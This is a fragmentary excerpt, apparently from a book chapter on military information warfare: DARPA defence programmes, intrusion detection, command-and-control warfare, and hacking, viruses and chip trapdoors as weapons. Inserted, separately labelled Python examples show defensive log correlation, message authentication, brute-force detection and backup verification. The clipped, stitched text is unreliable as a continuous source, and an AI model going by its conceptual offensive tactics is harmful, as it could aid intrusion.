For the information warrior, the basic issues are protecting oneself from attack, identifying the attacker, and then responding
...
Here, commercial firms have led the way, producing a host of off-the-shelf hardware, software, and services, from firewalls [1] to intrusion sensors to encryption schemes
...
The U.S. military is generally regarded as being farthest along in its IW preparedness
...
A further recognition has been that simply trying to “keep the bad guys out” is futile
...
Nowadays the focus is on keeping so-called mission-critical networks up and running and detecting intruders early on, before any real harm is done
...
A system administrator typically only has local knowledge of the health of his own system
...
Achieving such a network-wide perspective is the aim of Cyberpanel, a new Defense Advanced Research Projects Agency (DARPA) program, as discussed in Sidebar, “Renegotiating the Human–Machine Interface
...
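One concrete form of the network-wide perspective the paragraph above describes, as an added example rather than anything from DARPA's Cyberpanel program: each host's sensor reports events that, taken on their own, stay under any reasonable alarm threshold, and only correlating every host's stream by source address over a time window exposes a sweep across hosts and a password spray. Host names, addresses, timestamps and log lines are constructed for the example; the thresholds are illustrative parameters, not values from the text.

```python
"""Cross-host alert correlation (added example, not DARPA's Cyberpanel code).
Seen from any one host the activity below is unremarkable; correlating all
hosts' sensor streams by source address exposes what no single administrator
would see.  Hosts, addresses, timestamps and log lines are constructed."""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

# One line per sensor event: ISO timestamp, reporting host, source address, event type.
LINE = re.compile(r"(?P<ts>\S+) host=(?P<host>\S+) src=(?P<src>\S+) event=(?P<event>\S+)")

SAMPLE_LINES = """\
2004-03-02T10:00:05 host=web1 src=198.51.100.9 event=port_probe
2004-03-02T10:00:41 host=web2 src=198.51.100.9 event=port_probe
2004-03-02T10:01:17 host=db1 src=198.51.100.9 event=port_probe
2004-03-02T10:02:02 host=mail1 src=198.51.100.9 event=port_probe
2004-03-02T10:03:10 host=web1 src=198.51.100.23 event=auth_failure
2004-03-02T10:03:12 host=web1 src=198.51.100.23 event=auth_failure
2004-03-02T10:03:40 host=web2 src=198.51.100.23 event=auth_failure
2004-03-02T10:03:42 host=web2 src=198.51.100.23 event=auth_failure
2004-03-02T10:04:15 host=db1 src=198.51.100.23 event=auth_failure
2004-03-02T10:04:17 host=db1 src=198.51.100.23 event=auth_failure
2004-03-02T10:04:50 host=mail1 src=198.51.100.23 event=auth_failure
2004-03-02T10:04:52 host=mail1 src=198.51.100.23 event=auth_failure
2004-03-02T10:06:00 host=web1 src=10.0.0.5 event=auth_failure
sensor restarted: this line is deliberately not in the event format
""".splitlines()


def parse(lines: list[str]) -> list[dict]:
    """Parse sensor lines into time-sorted events; lines that do not match
    the format are skipped rather than allowed to break the correlator."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.fromisoformat(rec["ts"])
        events.append(rec)
    return sorted(events, key=lambda e: e["ts"])


def per_host_view(events: list[dict]) -> dict[str, int]:
    """What each host's own sensor would count: the most authentication
    failures it saw from any single source address."""
    counts: dict[tuple[str, str], int] = defaultdict(int)
    for e in events:
        if e["event"] == "auth_failure":
            counts[(e["host"], e["src"])] += 1
    view: dict[str, int] = defaultdict(int)
    for (host, _src), n in counts.items():
        view[host] = max(view[host], n)
    return dict(view)


def correlate(events: list[dict], window: timedelta = timedelta(minutes=5),
              host_threshold: int = 3, spray_threshold: int = 6) -> list[tuple]:
    """Network-wide view.  For each source address, slide a time window over
    its events across all hosts.  A sweep is one source reaching at least
    host_threshold distinct hosts inside the window; a password spray is one
    source accumulating at least spray_threshold auth failures inside the
    window, however few landed on any one host."""
    by_src: dict[str, list[dict]] = defaultdict(list)
    for e in events:            # events are already time-sorted
        by_src[e["src"]].append(e)

    detections: list[tuple] = []
    for src, evs in by_src.items():
        best_hosts: set[str] = set()
        best_fails = 0
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            hosts = {e["host"] for e in win}
            fails = sum(1 for e in win if e["event"] == "auth_failure")
            if len(hosts) > len(best_hosts):
                best_hosts = hosts
            best_fails = max(best_fails, fails)
        if len(best_hosts) >= host_threshold:
            detections.append(("sweep", src, sorted(best_hosts)))
        if best_fails >= spray_threshold:
            detections.append(("password_spray", src, best_fails))
    return detections


if __name__ == "__main__":
    evs = parse(SAMPLE_LINES)
    print("per-host view (max failures from one source):", per_host_view(evs))
    for d in correlate(evs):
        print("network-wide:", d)
```

The per-host view never exceeds two failures from any one source, which is below the lockout or alert threshold on most systems, while the correlated view reports eight failures from one address and two sources that each touched four hosts inside five minutes. The same structure scales to a central collector: ship each host's lines, key by source, and slide the window.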
The work at the DARPA ITS office is defensive, rather than offensive, in nature
...
Historically, DARPA not only was significant in generating technologies such as the Internet, but also in developing methods for protecting these systems
...
DARPA spent the early to mid-1990s patching the holes in these initial systems
...
One problem is that DARPA is moving ground
...
In looking at the next-generation networks, they have to work iteratively so that functionality and security are negotiated in tandem
...
Their attitude was, They fund this work, which leads to commercial products, which the Department of Defense (DoD) then buys, and that’s how they fulfill their defense mission
...
Thus, DARPA is now working with the Pacific Command, which covers about 53% of the earth’s surface
...
Nothing will test what they do more than that
...
Eventually, an all-optical network might look like a telecommunications network with a single switch from one person to you and with a central hub
...
Also, it is almost impossible to detect the connection, because the signal is highly multiplexed over several wavelengths
...
If DARPA can field these advanced systems for a DoD environment, which would involve about a hundred thousand nodes, they could be the precursors of what will enter the commercial market
...
The defense analyst is not only looking for needles in a haystack but also pieces of needles
...
Thus, DARPA has to start assigning to machines more of the job of searching data, looking for associations, and then presenting to the analyst something he or she can understand
...
It amplifies what the human is good at
...
So how does a machine understand a commander’s intent? To allow them to communicate, DARPA needs a machine prosthesis to do the translation
...
Erroneous times and locations began showing up on screen; planes needing refueling were sent to rendezvous with tankers that never materialized, and one tanker was dispatched to two sites simultaneously
...
The DoD itself staged the attack as a simulation to demonstrate the first-ever “real-time information recovery and response” during an IW attack
...
AGENT-BASED SYSTEMS
Software agents are defined very broadly: enabling real machine-to-machine communications, allowing machines to understand content, send messages, do negotiations, and so on
...
It’s aimed at semantic interoperability—to make more of what’s online machine readable
...
You can’t ask it to do a content-based search for you, because it can’t understand the content
...
The better machines are at recognizing content, the more they can share content, and the more agent-based systems can be built
...
Different communities have different terms for the same thing, or the same term for different things
...
On the current Web, you can’t search on one term and find the other
...
A famous failure of that system is the U.S. bombing of the Chinese embassy in Belgrade during the Kosovo campaign
...
All that only works if DARPA’s systems, which were built by different people speaking different languages and using different approaches, can be integrated
...
The ability to quickly throw together systems in a command center or on the battlefield is crucial
...
BROAD ACADEMIC–INDUSTRY–GOVERNMENT COLLABORATIONS
In DAML, for example, DARPA is working very closely with the World Wide Web Consortium
...
They’re making sure DARPA learns from their experiences
...
One has to ensure the flow of information to the information warrior
...
New information technology will undoubtedly open up new attack routes, alongside whatever desirable features it may offer
...
Jamming remains the tried-and-true mode of attack, but what if, instead of blocking signals, the enemy were to infiltrate communications links and send out false data? Just detecting such a radio frequency (RF) attack is tricky
...
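For the two failure modes above (false rendezvous times and locations injected into a planning picture, and an adversary infiltrating a link to send false data rather than jamming it) the standard countermeasure is to authenticate every message and bind it to a sequence number, so the receiver rejects forgeries and replays before they reach a display. What follows is an added example, not code from the book or from JTRS: HMAC-SHA256 over a framed message under a shared key that is assumed to have been distributed out of band. The key, the message contents and the frame format are constructed for the example.

```python
"""Authenticated, sequence-numbered messages on a contested link (added
example; not code from the book or from JTRS).  Key, messages and the frame
format are constructed for the example."""
from __future__ import annotations

import hashlib
import hmac
import json
import secrets


def _frame(rec: dict) -> bytes:
    # canonical encoding so sender and receiver authenticate identical bytes
    return json.dumps(rec, sort_keys=True, separators=(",", ":")).encode()


class Sender:
    def __init__(self, key: bytes):
        self.key = key
        self.seq = 0

    def send(self, payload: dict) -> bytes:
        """Return body|tag; the tag covers the sequence number and payload."""
        self.seq += 1
        body = _frame({"seq": self.seq, "msg": payload})
        tag = hmac.new(self.key, body, hashlib.sha256).hexdigest().encode()
        return body + b"|" + tag


class Receiver:
    def __init__(self, key: bytes):
        self.key = key
        self.last_seq = 0
        self.gaps = 0               # frames the link lost or an adversary deleted
        self.accepted: list[dict] = []
        self.rejected: list[tuple[str, bytes]] = []

    def receive(self, frame: bytes) -> dict | None:
        body, _, tag = frame.rpartition(b"|")
        expected = hmac.new(self.key, body, hashlib.sha256).hexdigest().encode()
        # constant-time compare: never branch on which byte of the tag differs
        if not hmac.compare_digest(expected, tag):
            self.rejected.append(("bad_tag", frame))     # forged or modified in transit
            return None
        rec = json.loads(body)
        if rec["seq"] <= self.last_seq:
            self.rejected.append(("replay", frame))      # old genuine frame re-sent
            return None
        if rec["seq"] > self.last_seq + 1:
            self.gaps += rec["seq"] - self.last_seq - 1  # deletion is visible only as a gap
        self.last_seq = rec["seq"]
        self.accepted.append(rec["msg"])
        return rec["msg"]


def forge(frame: bytes, **changes) -> bytes:
    """An adversary on the link edits fields of a captured frame.  Without
    the key it can only reuse the old tag, which no longer matches."""
    body, _, tag = frame.rpartition(b"|")
    rec = json.loads(body)
    rec["msg"].update(changes)
    return _frame(rec) + b"|" + tag


def demo(key: bytes | None = None) -> Receiver:
    key = key or secrets.token_bytes(32)   # assumed distributed out of band
    tx, rx = Sender(key), Receiver(key)
    genuine = tx.send({"type": "refuel", "tanker": "T-02", "time": "1430Z", "lat": 36.1, "lon": 43.2})
    rx.receive(genuine)                                  # accepted
    rx.receive(forge(genuine, lat=35.0, lon=41.9))       # false rendezvous: bad tag
    rx.receive(genuine)                                  # replay of the real frame
    rx.receive(tx.send({"type": "refuel", "tanker": "T-02", "time": "1500Z", "lat": 36.4, "lon": 43.5}))
    return rx


if __name__ == "__main__":
    rx = demo()
    print("accepted:", rx.accepted)
    print("rejected:", [reason for reason, _ in rx.rejected], "gaps:", rx.gaps)
```

What this does not detect is deletion or jamming: a dropped frame shows up only as a jump in the sequence number, which the receiver counts in gaps and an operator should treat as a signal in its own right rather than silently accept the next frame. Confidentiality is a separate matter; a tag proves who sent a message and that it is fresh, not that nobody else read it.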
For example, Joint Tactical Radio System (JTRS) will support, in a single downstream box, all the legacy waveforms and provide interoperability among all existing and envisioned tactical radios
...
Being computer-based, however, it introduces a whole new threat to radios
...
Given that you’re able to determine the culprit, what is the appropriate response? Obviously, you’d have one response for a teenage hacker at a university in the United States and quite a different one for somebody abroad who is working for a government
...
It’s safe to assume, though, that the arsenal includes all the tactics deployed by ordinary hackers (worms, viruses, trapdoors, logic bombs), as well as surveillance technology for intelligence purposes
...
The latter include lower-level strikes on specific targets carried out over months or years by, for example, an insider whose cooperation has been volunteered, bought, or coerced by a foreign state
...
Pulling off an electronic Pearl Harbor, on the other hand, would mean not only bringing down vast and disparate networks, but also keeping them down long enough to inflict real harm
...
Attacks on important, highly visible sites (the NASDAQ, for example) might shake public confidence
...
Therefore, this type of attack is what the military is most vulnerable to, and should be their greatest concern
...
Anyone still caught uttering “electronic Pearl Harbor” is either an ex-cold warrior trying to drum up antiterrorism funding through the clever use of propaganda or a used-car salesman or white-collar crook of some type
...
Any time you institute a new technology, there are going to be downsides
...
Thus, the way to have the positives and not the negatives is to attend to the safety and security issues
...
If the national security of the United States were really on the line, there’s a lot people could do that they haven’t done yet
...
This is not to say that you shouldn’t have a few cops on the beat to keep an eye out for anomalous online activity, but life is not risk-free
...
OVERVIEW OF MILITARY TACTICS
The planning, security, and intelligence considerations of military information
warfare tactics (MIWT) must be present in all aspects of the military information
operations (MIO) development process, as discussed in Chapter 13
...
The Information Warfare Arsenal and Tactics of the Military
377
Planning
MIWT operations, like most operations, can only be effective when adequate attention is given to the overall objective to which they are being applied
...
The main objective of planning is to
ensure that information operations within the MIWT environment are focused on
the wider military strategies and, therefore, the security objectives of the nation
...
Security
Military operations are most effective when they surprise an enemy
...
This applies to the MIWT environment as much
as it does to any other discipline of warfare
...
The integrity of friendly software, hardware, communications, procedures, people, and strategies is an essential part of the MIWT
environment
...
Security measures for ITS must not rely on any one aspect of that system
...
These systems will alert users if infiltration into the system is suspected
...
Therefore, information security must address each of the elements of
the ITS, including the people
...
Information security
is a significant activity in the MIWT process
...
Intelligence
Intelligence provides IW practitioners with assessments of an enemy’s ITS and their
likely reactions, both human- and machine-directed, following the commencement of an information attack
...
Planning attacks against such systems requires refinement in response to such changes, often at the last minute and occasionally during an attack
...
OFFENSIVE RUINOUS IW TOOLS AND TACTICS
The U.S. military has a new mission: Be ready to launch an offensive ruinous cyberattack against potential adversaries, some of whom are stockpiling cyberweapons
...
A few years ago, an order from the National Command Authority (backed
by President Bush and Colin Powell) instructed the military to
gear up to wage cyberwar
...
The military sees three emerging threats: ballistic missiles, cyberwarfare, and
space control
...
This strategy
would detail actions to be followed by the Unified Commanders in Chief (CINC)
if the president and the secretary of defense order a cyberstrike
...
The IW strategy is detailed in a defense plan called “OPLAN 3600.”
...
Other countries, including Russia, Israel, and China, are further along in building
their IW capabilities
...
The Chinese are already moving along with this
...
That’s one reason the U.S. Space Command is joining with the
FBI to build an IW strategy
...
The FBI will have to help determine if any cyberattack (see
sidebar, “Cyberoffense Mired in Cold War”) suffered by U.S. military or business
entities calls for a military or law enforcement response
...
The United States is still mired in a Cold War–era defense-spending mentality
...
The consequences of a cyberterrorist attack could be devastating
...
Without a clear-cut example of an electronic Pearl Harbor, where a surprise cyberattack cripples financial markets and other critical systems, it’s difficult to convince
top military and political leaders that IT research and development should be a bigger priority in the budget process
...
Although attacks historically have
been labeled as “nuisances,” that may not be the correct way to look at the problem
...
Part of the problem is that DoD remains committed to lobbying Congress
for money to pay for programs such as the F-22 and the Joint Strike Fighter instead of
increasing funding for IT programs
...
DoD’s assumptions about future budget gains are wrong
...
That type of investment would preclude the need to buy costly systems such
as the F-22
...
Usually, when a major crisis costs people a lot of
money, it leads to many visits to Capitol Hill and requests for help
...
Some experts have questioned the government’s liberal use of the term terrorism
to describe acts of mass disruption of the Internet
...
The United States is attempting to be proactive, but many believe
that the United States is going to get seriously nailed
...
However, one of the biggest challenges facing the nation, highlighted during the
love bug incident, remains convincing industry that security is as important as making money
...
It has to become part of the business case
...
It allows attacks from anywhere in the world
...
It could start across the
street but appear to be coming from China
...
A cyberattack can include espionage using computer networks
...
It’s serious enough that the FBI issued an alert about it to the U.S. Space Command, giving U.S. forces warning that the action on the cyber front
could affect them as well
...
The United States’ approach to C2W is comprehensive
...
Countries like Australia, however, like most non-superpower
nations of the world, will not be able to commit the substantial resources needed to
follow the American model
...
Command and control warfare (C2W) is the approach to military operations that
employs all measures (including but not limited to Electronic Warfare [EW], military deception, psychological operations [psyops], operations security, and targeting) in a deliberate and integrated manner, mutually supported by intelligence and
ITS, to disrupt or inhibit an adversary’s ability to command and control his or her
forces while protecting and enhancing our own
...
There are
five elements of C2W, covering both offensive and defensive applications:
Operations security
Military deception
Psychological operations
Electronic warfare
Targeting
Operations Security
Operations security (OPSEC) is a term that appears in many military documents in
almost as many contexts, with several apparently different meanings
...
It requires the employment of specialist equipment, including software, the adoption of suitable procedures, and most
important, the development of a pro-security organizational culture
...
By denying a potential enemy an understanding of the capabilities of friendly systems, a hostile C2W effort is more likely to miscalculate the friendly information capabilities and therefore to be ineffective
...
The objective of military deception is to lead the enemy to false conclusions about friendly intentions, capabilities, or dispositions
...
There is no
point to influencing a decision if, in the event of ambiguity, the decision maker
passes the decision to a higher authority
...
Psychological Operations
Psychological operations (psyops) are operations that are planned activities in
peace and war directed to enemy, friendly, and neutral audiences to influence attitudes and behavior affecting the achievement of political and military objectives
...
Psyops have been used throughout history to influence adversary leaders and groups
...
Electronic Warfare
Electronic warfare (EW) is the military action involving the use of electromagnetic
energy to determine, exploit, reduce, or prevent hostile use of the electromagnetic
spectrum
...
Targeting
Targeting is not just a process, nor is it just focused on destructive ends
...
There are many hard- and soft-kill
options available to a commander
...
Hard or soft destruction requires the capability to remove selected targets from
an enemy’s order of battle
...
Destruction
may be achieved by any arm of the military
...
This can be either a desirable or undesirable outcome, and so must be considered when strategies are being developed
...
Accordingly, even though it is often the
most effective method of demonstrating resolve, physical destruction is generally
used as a last resort
...
The Objective of C2W
Until the 1991 Gulf War, the C2W elements had rarely been used in conjunction
with each other to specifically target an enemy’s ability to command and control its
forces
...
The ultimate objective of C2W is to decapitate the enemy’s command structure
from its body of combat forces while ensuring the integrity of friendly C2 systems
...
C2W activities are designed to
lift the fog of war for friendly forces while thickening the fog for the enemy
...
Therefore, the aim of C2W is to gain, maintain, or widen a gap
in the effectiveness of C2 in favor of friendly forces throughout a campaign and
particularly at decisive points in a battle
...
The concept of the OODA loop has its
origins in the Korean War, where an American pilot identified the advantages of
having good visibility and sensitive controls on board the U.S. Sabre jet fighters
...
The U.S. pilots simply had a shorter total period
between observing an event, orientating themselves to the possible ramifications
of the event, making a decision, and acting
...
Since the inception of air-to-air combat, staying inside the
enemy’s decision loop has been a consistent objective
...
The OODA loop concept is now applied to most aspects of modern warfare,
from land maneuvers to strategic missile developments
...
Those who are quick to observe an opportunity, recognize it, and exploit it are more often the successful businesspeople
...
Successful C2W operations will, therefore, lengthen the enemy’s decision
cycle (his or her OODA loop) to the point that he or she becomes increasingly vulnerable to attack
...
Even before the war had commenced, EW, psyops, and deception were employed to influence the Iraqi people and hierarchy
...
The Iraqi air defense system was virtually shut down by coalition activity within hours of the commencement of Operation Desert Storm
...
Shutting such an extensive system down with apparent ease
was a significant achievement and the result of a calculated offensive involving all
of the C2W elements
...
In
turn, this supremacy significantly reduced the potential for coalition air fatalities
and allowed the coalition air forces to strike Iraqi ground targets almost at will
...
In the 2003 Operation Iraqi Freedom, defense of friendly C2 systems and attacks on enemy systems were of paramount importance
...
A confused army leads to
another’s victory
...
The DoD has developed a policy that mandates the use of intrusion detection systems in all military networks
...
Roughly
15% of DoD networks, such as satellite links, are considered mission-critical
...
Thus, the Defense Information Systems Agency (DISA) is responsible for defining
the intrusion detection plan
...
The military helped pioneer intrusion detection systems by building its own
software from scratch in 1996
...
Today, still only a small percentage of the military’s
overall networked systems are guarded by any form of intrusion detection
...
Some defense-related agencies, such as the secretive NSA in Fort Meade, Maryland, already require round-the-clock monitoring of computer hosts and networks
...
In the Defense Intelligence Agency, it’s
the same sort of situation
...
In addition, intrusion detection software can raise “false
positives,” alarms about trouble that is not there, and the software occasionally needs to be fine-tuned to work correctly
...
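The false-positive point is easiest to see on real log lines. What follows is an added example, not code from the book or from any DoD or DISA system: a minimal brute-force-login detector over constructed sshd-style log lines (hypothetical host name, documentation-range IP addresses), showing how a bare failure-count threshold fires on an authorized scanner and how two tuning knobs, an allowlist and a minimum number of distinct usernames, suppress that alarm while keeping the real one.

```python
"""Brute-force login detector with tuning knobs (added example, not from the book).

Parses sshd-style "Failed password" lines, counts failures per source address,
and alerts above a threshold. The allowlist and min_distinct_users parameters
are the kind of fine-tuning the text refers to. All log lines, host names and
IP addresses below are constructed for this example.
"""
import re
from collections import Counter, defaultdict

# Constructed sample log: hypothetical host "bastion", documentation-range IPs.
SAMPLE_LOG = """\
Mar 10 08:00:01 bastion sshd[4410]: Failed password for root from 203.0.113.9 port 51000 ssh2
Mar 10 08:00:02 bastion sshd[4410]: Failed password for root from 203.0.113.9 port 51001 ssh2
Mar 10 08:00:03 bastion sshd[4410]: Failed password for admin from 203.0.113.9 port 51002 ssh2
Mar 10 08:00:04 bastion sshd[4410]: Failed password for admin from 203.0.113.9 port 51003 ssh2
Mar 10 08:00:05 bastion sshd[4410]: Failed password for oracle from 203.0.113.9 port 51004 ssh2
Mar 10 08:00:06 bastion sshd[4410]: Accepted publickey for ops from 198.51.100.7 port 40010 ssh2
Mar 10 08:01:10 bastion sshd[4411]: Failed password for invalid user test from 192.0.2.50 port 33001 ssh2
Mar 10 08:01:11 bastion sshd[4411]: Failed password for invalid user test from 192.0.2.50 port 33002 ssh2
Mar 10 08:01:12 bastion sshd[4411]: Failed password for invalid user test from 192.0.2.50 port 33003 ssh2
Mar 10 08:01:13 bastion sshd[4411]: Failed password for invalid user test from 192.0.2.50 port 33004 ssh2
Mar 10 08:01:14 bastion sshd[4411]: Failed password for invalid user test from 192.0.2.50 port 33005 ssh2
"""

# Matches both "Failed password for root from ..." and
# "Failed password for invalid user test from ...".
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3})"
)


def failed_logins_by_source(log_text):
    """Return {src_ip: Counter(username -> failure count)} parsed from the log."""
    by_src = defaultdict(Counter)
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            by_src[m.group("src")][m.group("user")] += 1
    return by_src


def detect(log_text, threshold=5, min_distinct_users=1, allowlist=frozenset()):
    """Alert on sources with >= threshold failures spread over
    >= min_distinct_users usernames, skipping allowlisted sources.
    Returns sorted (src, total_failures, distinct_users) tuples."""
    alerts = []
    for src, users in failed_logins_by_source(log_text).items():
        total = sum(users.values())
        if src in allowlist or total < threshold or len(users) < min_distinct_users:
            continue
        alerts.append((src, total, len(users)))
    return sorted(alerts)


# Tuning input: 192.0.2.50 is assumed (a constructed fact for this example) to be
# the authorized vulnerability scanner, so its failed logins are expected noise.
AUTHORIZED_SCANNERS = frozenset({"192.0.2.50"})

if __name__ == "__main__":
    print("untuned        :", detect(SAMPLE_LOG))
    print("allowlisted    :", detect(SAMPLE_LOG, allowlist=AUTHORIZED_SCANNERS))
    print("spray-only rule:", detect(SAMPLE_LOG, min_distinct_users=2))
```

Untuned, the rule reports both sources; the allowlist removes the scanner, and so does requiring failures across at least two usernames (the scanner hammers one account, the attacker sprays three). Either knob is a judgement that must be revisited when the environment changes, which is the maintenance burden the text alludes to.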
Not all attempts by the federal government to put large-scale intrusion detection systems in place have succeeded
...
FIDNet, as it was called, was envisioned by the White House as a government-wide intrusion detection network to
monitor activities across civilian and defense networks
...
Although the General Services Administration (GSA) issued a draft RFP for FIDNet, GSA indicates
the idea has been shelved
...
They’ve opted not to go with managed security
...
Therefore, any organization that wants to take advantage of managed security services has to share detailed knowledge about its operations so that intrusion detection systems can be
properly used
...
The deputy secretary of defense approved a plan that would establish five joint reserve virtual information operations (JRVIO) and information
assurance organizations
...
Information operations has emerged as an area that is extremely well suited to
the integration of reserve capabilities
...
The DoD has long been battling a high-tech brain drain spurred by a booming economy and the lure of higher-paying jobs in the private sector
...
At the
same time, the Pentagon is facing an increase in cyberattacks and intrusions and
has increased its focus on using cybertactics to fight future conflicts
...
The Pentagon expects 526 reserve officers and enlisted personnel to staff the
five JRVIOs during fiscal 2005 and 2006 in Maryland, Virginia, and Texas
...
The initiative is a result of a two-year Pentagon study called “Reserve Component
Employment 2006.”
...
The study also urged the department to recruit
high-tech-savvy people from the private sector
...
Computers and associated technology have
helped change the face of modern information warfare tactics by providing the capabilities to generate and process massive amounts of data and disseminate the resultant information throughout the battlespace
...
They may also be used as weapons
in their own right
...
These techniques are primarily aimed at targeting the enemy’s broad information environment
...
Although generally strategic in nature,
computer operations may be applied to the tactical and operational components of
the conventional warfare environment, either in support of C2W operations or in
direct support of air, land, or sea operations
...
Someone who uses a computer to
rob a bank is a criminal, not a hacker
...
Unfortunately, exploring today’s computer science often means entering other
people’s systems
...
Most simply gain access to the systems,
snoop around for a while, and leave
...
A few like to exploit these systems for either their own gain or simply to
make life difficult for the users of that system
...
However,
most users of systems understandably find it an unacceptable invasion of their privacy to have people intruding into their systems
...
Hackers have historically found the challenge of breaking
into so-called secure military systems one of the more satisfying aspects of their
hobby
...
Once access is gained into a system, hackers can generally manipulate whatever
files they wish
...
A hacker can, of course, collect very important
information
...
In the government service domain, sensitive personal information
can be obtained (or altered), which can later be used against individuals
...
A hacker can also change the file
structure, amend the logic flow, and even destroy parts of the system
...
There have been several reports about government
sponsorship of such activity
...
The basic tool
kit of today’s industrial spy consists of a PC and a modem
...
Neither domestic nor international laws adequately address all of the issues surrounding hacking
...
The impact on those involved in developing MIWT is that hacking presents a
genuine threat to the security and integrity of both military and civilian information systems
...
Most
defensive strategies are system dependent; therefore, listing them in this chapter
would be pointless
...
The other reason national security forces should become involved in hacking is
the potential benefits that can be derived by employing hacking techniques as an offensive tactic
...
In future wars, information derived from hacking will form a large part of intelligence databases and, thus,
manipulation of the enemy’s decision-making support systems will become routine
...
A virus executes only when its host program begins to run
...
Protecting
against computer viruses has become a part of using modern ITS
...
Although statistics concerning
viruses are often difficult to substantiate, some specialists estimate that there are
as many as 11,233 viruses currently existing on the Internet, with cures being
available for only 4,583
...
The most effective method of minimizing the risk of virus attack and minimizing the damage caused by viruses in the event of an attack, is by employing
sound and rigorous information-management procedures
...
The use of the
most recent anti-virus software and the screening of disks every time they are placed
in a computer will reduce the risk of disk infections being passed onto systems
...
Viruses, however, can also be backed up: a dormant virus can infect the
backup files and be reintroduced when a system is recovered from them
...
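One concrete control for the backup problem just described, as an added example (not the book’s own procedure or any particular product): record a hash of every file while the system is known to be clean, and at restore time refuse to put back anything whose hash has changed or that was not in the baseline at all. The file paths and contents below are constructed in memory; hashing uses SHA-256 from the standard library.

```python
"""Verify a backup set against a known-good hash manifest before restoring it.

Added example, not from the book. A dormant virus copied into a backup comes
back with the restore, so the restore step checks every file against hashes
recorded when the system was known to be clean. Paths and contents here are
constructed in memory for the example.
"""
import hashlib


def sha256(data: bytes) -> str:
    """Hex SHA-256 of a byte string."""
    return hashlib.sha256(data).hexdigest()


def build_manifest(files: dict) -> dict:
    """files: {path: bytes} captured from a known-clean system -> {path: hex digest}."""
    return {path: sha256(data) for path, data in files.items()}


def verify_backup(backup: dict, manifest: dict):
    """Classify every path in the backup set against the manifest.

    Returns (ok, modified, unknown) as sorted lists of paths:
      ok       - content hash matches the clean baseline
      modified - path was baselined but its content changed (e.g. infected)
      unknown  - path is absent from the baseline (e.g. a dropped file)
    """
    ok, modified, unknown = [], [], []
    for path, data in backup.items():
        expected = manifest.get(path)
        if expected is None:
            unknown.append(path)
        elif sha256(data) != expected:
            modified.append(path)
        else:
            ok.append(path)
    return sorted(ok), sorted(modified), sorted(unknown)


def safe_restore(backup: dict, manifest: dict) -> dict:
    """Restore only files whose hash matches the manifest; quarantine the rest."""
    ok, modified, unknown = verify_backup(backup, manifest)
    return {
        "restored": {path: backup[path] for path in ok},
        "quarantined": sorted(modified + unknown),
    }


# Constructed clean baseline, captured while the host was known-good.
CLEAN = {
    "/usr/bin/login": b"ELF\x01clean-login-binary",
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
}
MANIFEST = build_manifest(CLEAN)

# Constructed backup taken later: the login binary has had bytes appended
# (standing in for a file infector) and an unexpected file has appeared.
BACKUP = {
    "/usr/bin/login": b"ELF\x01clean-login-binary" + b"<viral-appendix>",
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
    "/tmp/.dropper": b"#!/bin/sh\necho pwned\n",
}

if __name__ == "__main__":
    result = safe_restore(BACKUP, MANIFEST)
    print("restored   :", sorted(result["restored"]))
    print("quarantined:", result["quarantined"])
```

Two caveats a practitioner would add. The manifest is only as trustworthy as its storage: it must be kept where the infected host cannot rewrite it (offline, or signed with a key the host does not hold), or the virus simply ships with a matching manifest. And the scheme only covers files that were baselined; data files that legitimately change between baseline and backup fall into "modified" and still need conventional anti-virus screening before they are trusted.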
Anti-virus strategies are aimed at minimizing the
chances of getting a virus and minimizing the damage that viruses can cause if they
are introduced
...
Simple procedures will often be enough to avoid viruses, but a single failure to comply with
anti-virus procedures can result in systems becoming inoperable
...
If a simple
virus can be injected into the systems of a potential enemy, the need to expend effort in physically attacking that system may be eliminated
...
Few, however, are aware of the risk to the essential hardware components of an ITS
...
Today’s chips contain millions of transistors, and their logic can easily
be configured by the manufacturer to initiate unexpected events at a specific time or
under specific circumstances
...
There is almost no way of detecting whether a chip contained within a piece of equipment has been corrupted
...
Economically,
this is often not feasible
...
Establishing an indigenous manufacturing capability would increase the cost of acquiring the
equipment
...
Chipping represents a simple way to develop a conventional military advantage
by those countries that regularly export military equipment
...
This makes economic as well
as military sense
...
Many other computer weapons can be used in conjunction with or instead of
chipping, viruses, and hacking
...
They are all examples of computer operations that
may be adapted to suit the IW environment
...
Suffice to say that computer
weapons should be an integral part of any IW operations strategy
...
COUNTERING SUSTAINED TERRORIST IW TACTICS
Terrorism is, among other things, a weapon used by the weak against the strong
...
Terrorism will accompany changes at each of these levels, as it has in
other periods of flux in the international environment
...
The United States will also have a
unique, systemic interest in terrorism as a global problem (including acts of domestic terrorism confined within state borders, which make up the bulk of terrorism worldwide) even where the United States is not directly or even indirectly
targeted
...
Many of the United States’ high-priority national objectives have been shaken
by the recent experience of terrorism
...
Attacks against U.S. forces in Saudi Arabia raise questions
about the United States’ strategy for presence and stability in an area of critical importance for world energy supply
...
The attack on the USS Cole in Yemen raises questions about the exposure
that comes with active engagement in world affairs and point to the risks of privately sponsored terrorism
...
Elsewhere, terrorism has destabilized allies
(in Saudi Arabia, Egypt, and Turkey) and has rendered counternarcotics relationships difficult (in Colombia and Mexico)
...
Overall Observations
Most contemporary analyses of terrorism focus on terrorist political violence as a
stand-alone phenomenon, without reference to its geopolitical and strategic context
...
Prior to the specter of superterrorism, using weapons of
mass destruction, terrorism, however horrible, never posed a threat to U.S. security
...
However, many types of terrorism do pose a threat to U.S. interests, from
homeland defense to regional security and the stability of the international system
...
In light of the preceding IW arsenal and tactics analysis of the military, certain overall sustained terrorist IW tactics observations stand out:
Terrorism
Geopolitics of terrorism
Counterterrorism versus new terrorism
U.S. exposure
Comprehensive counterterrorism strategy
Terrorism
Terrorism is becoming a more diverse and lethal problem
...
For a variety of reasons, primarily the rise of religious
cults with transcendent agendas, but also the hardening of established political
groups, terrorism has become more lethal
...
Geopolitics of Terrorism
The geopolitics of terrorism are changing
...
The Balkans, the
former Soviet Union, and Latin America are set to emerge as significant sources of
terrorism aimed at or affecting U.S. civilian and military activities
...
